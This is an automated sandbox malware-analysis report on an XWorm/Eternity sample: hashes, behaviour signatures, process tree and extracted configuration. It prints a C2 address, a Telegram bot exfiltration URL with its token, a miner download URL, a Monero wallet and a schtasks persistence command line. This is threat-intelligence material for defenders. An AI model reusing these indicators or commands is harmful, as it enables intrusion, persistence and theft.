eternity | a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d

Analysis

max time kernel
600s
max time network
593s
platform
windows10-1703_x64
resource
win10-20240221-en
resource tags

arch:x64arch:x86image:win10-20240221-enlocale:en-usos:windows10-1703-x64system
submitted
28-03-2024 00:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

x326.exe
Size

455KB
MD5

c8d9593196962fa5d706a207c16674cd
SHA1

686a8e674e6615d5cd91f7b2cba0c755054b3f69
SHA256

a50078c294c3980c23fc8da34f3fd1dc8ca042e07e0f7f67696d7035ec84700d
SHA512

5ddae80780c6091bfe0ab5e29bc63732c08ce34f677fc341366dcecf6db9e1bd2e0ed24cfe57eface0d19c6f46010f47eb2d74888b91a503dae00651c4a756bf
SSDEEP

12288:XcTpGLwWpFGIWFfDtaY4S0LEy7w0iymL/:XOpEwiFYxsEyHiyK

Score

10^/10

eternity xworm evasion persistence rat trojan

Malware Config

Extracted

Family

xworm

Version

5.1

104.194.9.116:7000

Mutex

bUezpCDHVjUVS3W9

Attributes

install_file
USB.exe
telegram
https://api.telegram.org/bot6330888131:AAE5ycZdHuNqV5SVYhHeCfRENn6GuCjwXjs/sendMessage?chat_id=1046049845

aes.plain

Extracted

Family

eternity

Wallets

47vk9PbPuHnEnazCn4tLpwPCWRLSMhpX9PD8WqpjchhTXisimD6j8EvRFDbPQHKUmHVq3vAM3DLytXLg8CqcdRXRFdPe92Q

Attributes

payload_urls
https://raw.githubusercontent.com/VolVeRFM/SilentMiner-VolVeR/main/VolVeRBuilder/Resources/xmrig.exe

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/1568-6-0x0000000000400000-0x000000000040E000-memory.dmp	family_xworm

Eternity
Eternity Project is a malware kit offering an info stealer, clipper, worm, coin miner, ransomware, and DDoS bot.
eternity
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Creates new service(s) 1 TTPs
persistence

Windows Service
T1543.003
Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft.exe	vbc.exe

Executes dropped EXE 13 IoCs

pid	Process
2872	sovthz.exe
2852	zlftge.exe
5016	ftbskc.exe
5068	tdmyff.exe
4160	CasPol.exe
5000	CasPol.exe
216	pkiwizgebqxq.exe
168	CasPol.exe
508	CasPol.exe
2928	CasPol.exe
2172	CasPol.exe
4072	CasPol.exe
1972	CasPol.exe

Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

Drops file in System32 directory 13 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\ExplorerStartupLog.etl	pkiwizgebqxq.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe
File opened for modification	C:\Windows\system32\MRT.exe	explorer.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E01C1BB8321328324FC6C7164F9754E9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe

Suspicious use of SetThreadContext 6 IoCs

description	pid	Process	procid_target
PID 4176 set thread context of 1568	4176	x326.exe	74
PID 2872 set thread context of 2616	2872	sovthz.exe	79
PID 2852 set thread context of 5024	2852	zlftge.exe	85
PID 5016 set thread context of 1208	5016	ftbskc.exe	87
PID 5068 set thread context of 4228	5068	tdmyff.exe	97
PID 4228 set thread context of 1500	4228	explorer.exe	124

Launches sc.exe 9 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
4128	sc.exe
4688	sc.exe
3800	sc.exe
404	sc.exe
5000	sc.exe
1484	sc.exe
1724	sc.exe
4116	sc.exe
2912	sc.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	pkiwizgebqxq.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	pkiwizgebqxq.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2484	schtasks.exe

Modifies data under HKEY_USERS 16 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer	pkiwizgebqxq.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,17110992,7202269,41484365,17110988,7153487,39965824,17962391,508368333,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ExplorerStartupTraceRecorded = "1"	pkiwizgebqxq.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\MICROSOFT\OFFICE\16.0\COMMON\CLIENTTELEMETRY\RULESMETADATA\OFFICECLICKTORUN.EXE\ULSMONITOR	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2912	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
4176	x326.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
2852	zlftge.exe
4228	explorer.exe
4648	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3300	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4176	x326.exe
Token: SeDebugPrivilege	1568	msbuild.exe
Token: SeDebugPrivilege	2852	zlftge.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeIncreaseQuotaPrivilege	4648	powershell.exe
Token: SeSecurityPrivilege	4648	powershell.exe
Token: SeTakeOwnershipPrivilege	4648	powershell.exe
Token: SeLoadDriverPrivilege	4648	powershell.exe
Token: SeSystemProfilePrivilege	4648	powershell.exe
Token: SeSystemtimePrivilege	4648	powershell.exe
Token: SeProfSingleProcessPrivilege	4648	powershell.exe
Token: SeIncBasePriorityPrivilege	4648	powershell.exe
Token: SeCreatePagefilePrivilege	4648	powershell.exe
Token: SeBackupPrivilege	4648	powershell.exe
Token: SeRestorePrivilege	4648	powershell.exe
Token: SeShutdownPrivilege	4648	powershell.exe
Token: SeDebugPrivilege	4648	powershell.exe
Token: SeSystemEnvironmentPrivilege	4648	powershell.exe
Token: SeRemoteShutdownPrivilege	4648	powershell.exe
Token: SeUndockPrivilege	4648	powershell.exe
Token: SeManageVolumePrivilege	4648	powershell.exe
Token: 33	4648	powershell.exe
Token: 34	4648	powershell.exe
Token: 35	4648	powershell.exe
Token: 36	4648	powershell.exe
Token: SeShutdownPrivilege	4360	powercfg.exe
Token: SeCreatePagefilePrivilege	4360	powercfg.exe
Token: SeShutdownPrivilege	4544	powercfg.exe
Token: SeCreatePagefilePrivilege	4544	powercfg.exe
Token: SeShutdownPrivilege	4964	powercfg.exe
Token: SeCreatePagefilePrivilege	4964	powercfg.exe
Token: SeShutdownPrivilege	4124	powercfg.exe
Token: SeCreatePagefilePrivilege	4124	powercfg.exe
Token: SeDebugPrivilege	1500	dialer.exe
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE
Token: SeShutdownPrivilege	3300	Explorer.EXE
Token: SeCreatePagefilePrivilege	3300	Explorer.EXE

Suspicious use of FindShellTrayWindow 11 IoCs

pid	Process
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe
996	dwm.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
312	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 4176 wrote to memory of 1568	4176	x326.exe	74
PID 1568 wrote to memory of 2872	1568	msbuild.exe	78
PID 1568 wrote to memory of 2872	1568	msbuild.exe	78
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 2616	2872	sovthz.exe	79
PID 2872 wrote to memory of 4236	2872	sovthz.exe	80
PID 2872 wrote to memory of 4236	2872	sovthz.exe	80
PID 1568 wrote to memory of 2852	1568	msbuild.exe	83
PID 1568 wrote to memory of 2852	1568	msbuild.exe	83
PID 1568 wrote to memory of 5016	1568	msbuild.exe	84
PID 1568 wrote to memory of 5016	1568	msbuild.exe	84
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 2852 wrote to memory of 5024	2852	zlftge.exe	85
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 5016 wrote to memory of 1208	5016	ftbskc.exe	87
PID 1208 wrote to memory of 776	1208	CasPol.exe	89
PID 1208 wrote to memory of 776	1208	CasPol.exe	89
PID 1208 wrote to memory of 776	1208	CasPol.exe	89
PID 776 wrote to memory of 1572	776	cmd.exe	91
PID 776 wrote to memory of 1572	776	cmd.exe	91
PID 776 wrote to memory of 1572	776	cmd.exe	91
PID 776 wrote to memory of 2912	776	cmd.exe	92
PID 776 wrote to memory of 2912	776	cmd.exe	92
PID 776 wrote to memory of 2912	776	cmd.exe	92
PID 1568 wrote to memory of 5068	1568	msbuild.exe	93
PID 1568 wrote to memory of 5068	1568	msbuild.exe	93
PID 776 wrote to memory of 2484	776	cmd.exe	94
PID 776 wrote to memory of 2484	776	cmd.exe	94
PID 776 wrote to memory of 2484	776	cmd.exe	94
PID 776 wrote to memory of 4160	776	cmd.exe	95
PID 776 wrote to memory of 4160	776	cmd.exe	95

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:556
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  PID:996

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:732

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:912

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1020

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:704

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:1044

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1064

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1096
- c:\windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:3012
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:5000
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:168
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:1612
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:508
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:312
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:2928
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4248
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:2172
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4536
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:4072
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:652
- C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
  2⤵
  - Executes dropped EXE
  PID:1972
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:3584
  - - C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -u -p 3584 -s 580
      4⤵
      PID:4804

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1152

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1288

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1360
- c:\windows\system32\sihost.exe
  sihost.exe
  2⤵
  PID:2880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1560

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1576

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1812

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1820

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1872

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1904

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:2028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2280

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2316

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2332

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2404

C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
1⤵
PID:2444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2460

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2468

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2652

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3068

C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
1⤵
PID:3092

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:3300
- C:\Users\Admin\AppData\Local\Temp\x326.exe
  "C:\Users\Admin\AppData\Local\Temp\x326.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4176
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1568
  - - C:\Users\Admin\AppData\Local\Temp\sovthz.exe
      "C:\Users\Admin\AppData\Local\Temp\sovthz.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2872
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
        5⤵
        Drops startup file
        
        PID:2616
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2588
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe"
        5⤵
        
        PID:4236
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2772
  - - C:\Users\Admin\AppData\Local\Temp\zlftge.exe
      "C:\Users\Admin\AppData\Local\Temp\zlftge.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:2852
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 2852 -s 1204
        5⤵
        
        PID:1712
  - - C:\Users\Admin\AppData\Local\Temp\ftbskc.exe
      "C:\Users\Admin\AppData\Local\Temp\ftbskc.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:5016
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1208
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C chcp 65001 && ping 127.0.0.1 && schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe" &&START "" "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:776
        
        C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        7⤵
        
        PID:1572
        
        C:\Windows\SysWOW64\PING.EXE
        
        ping 127.0.0.1
        7⤵
        Runs ping.exe
        
        PID:2912
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "CasPol" /sc MINUTE /tr "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe" /rl HIGHEST /f
        7⤵
        Creates scheduled task(s)
        
        PID:2484
        
        C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe
        
        "C:\Users\Admin\AppData\Local\ServiceHub\CasPol.exe"
        7⤵
        Executes dropped EXE
        
        PID:4160
    - - C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 5016 -s 3164
        5⤵
        
        PID:4248
  - - C:\Users\Admin\AppData\Local\Temp\tdmyff.exe
      "C:\Users\Admin\AppData\Local\Temp\tdmyff.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      PID:5068
    - - C:\Windows\explorer.exe
        
        "C:\Windows\explorer.exe"
        5⤵
        Drops file in System32 directory
        Suspicious use of SetThreadContext
        Suspicious behavior: EnumeratesProcesses
        
        PID:4228
